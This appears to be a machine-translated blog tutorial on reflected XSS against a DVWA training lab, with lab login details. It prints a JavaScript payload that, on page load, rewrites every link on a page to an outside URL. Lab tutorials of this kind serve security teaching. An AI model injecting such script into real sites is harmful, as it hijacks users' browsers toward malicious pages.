当前位置:网站首页>XX attack - reflective XSS attack hijacking user browser
XX attack - reflective XSS attack hijacking user browser
2022-07-01 08:08:00 【Cwillchris】
Let's build a reflective XSS The attack jumps to the vulnerable page . In fact, it can also be in DVWA Attack directly in , But we constructed a relatively complex environment for demonstration purposes .
<script>
window.onload = function() {
var link=document.getElementsByTagName("a");
for(j = 0; j < link.length; j++) {
link[j].href="http://www.baidu.com";}
}
</script>
JavaScript The code analysis window.onload When the web page is loaded , perform function Anonymous functions
The functionality :document.getElementsByTagName Gets all of the a label , Store in link Array , Use for The cycle will link Replace all elements in the array with malicious URLs .
open chrome browser , We're in reflex XSS Test the effect
Sign in http://192.168.98.66/DVWA-master/login.php user name : admin password :password , Change it to low Level
边栏推荐
- [staff] high and low octave mark (the notes in the high octave mark | mark range are increased by one octave as a whole | low octave mark | mark range are decreased by one octave as a whole)
- Cmake I two ways to compile source files
- STM32 uses esp01s to go to the cloud, mqtt FX debugging
- 一套十万级TPS的IM综合消息系统的架构实践与思考
- The difference between interceptors and filters
- 【无标题】
- 使用 setoolkit 伪造站点窃取用户信息
- Implementation and encapsulation of go universal dynamic retry mechanism
- Aardio - Shadow Gradient Text
- Keithley 2100 software 𞓜 Keithley2400 test software ns SourceMeter
猜你喜欢
The Windows C disk is full
STM32 uses esp01s to go to the cloud, mqtt FX debugging
OJ输入输出练习
图扑软件通过 CMMI5 级认证!| 国际软件领域高权威高等级认证
![[question brushing] character statistics [0]](/img/cc/f5aaecd920c502180303d92447e54f.png)
[question brushing] character statistics [0]
Keithley 2100 software 𞓜 Keithley2400 test software ns SourceMeter
How to use layui to display the data in the database in the form of tables
How to make the two financial transactions faster
【入门】输入整型数组和排序标识,对其元素按照升序或降序进行排序
![[batch DOS CMD summary] extension variables - delay variables CMD /v:on, CMD /v:off, SETLOCAL enabledelayedexpansion, disabledelayedexpansion](/img/ce/6c9e4f2c54710610e8b1f68d6d8088.png)
[batch DOS CMD summary] extension variables - delay variables CMD /v:on, CMD /v:off, SETLOCAL enabledelayedexpansion, disabledelayedexpansion
随机推荐
Microsoft stream - how to modify video subtitles
Anddroid 文本合成语音TTS实现
Gru of RNN
[staff] key number (key number identification position | key number marking list | a major key identification principle | F, C, G position marking ascending | F major key identification principle | B
0 basic introduction to single chip microcomputer: how to use digital multimeter and precautions
Transaction method call @transactional
sqlalchemy创建MySQL_Table
ContentType所有类型对比
使用 setoolkit 伪造站点窃取用户信息
谈谈数字化转型的几个关键问题
[MySQL learning notes27] stored procedure
Principle and process of embossing
STM32 uses esp01s to go to the cloud, mqtt FX debugging
Saving db4i depth camera pictures with MATLAB
Five combination boxing, solving six difficult problems on campus and escorting the construction of educational informatization
seaborn clustermap矩阵添加颜色块
Set up file server Minio for quick use
[MySQL learning notes 28] storage function
Cyclic neural network
[MySQL learning notes 25] SQL statement optimization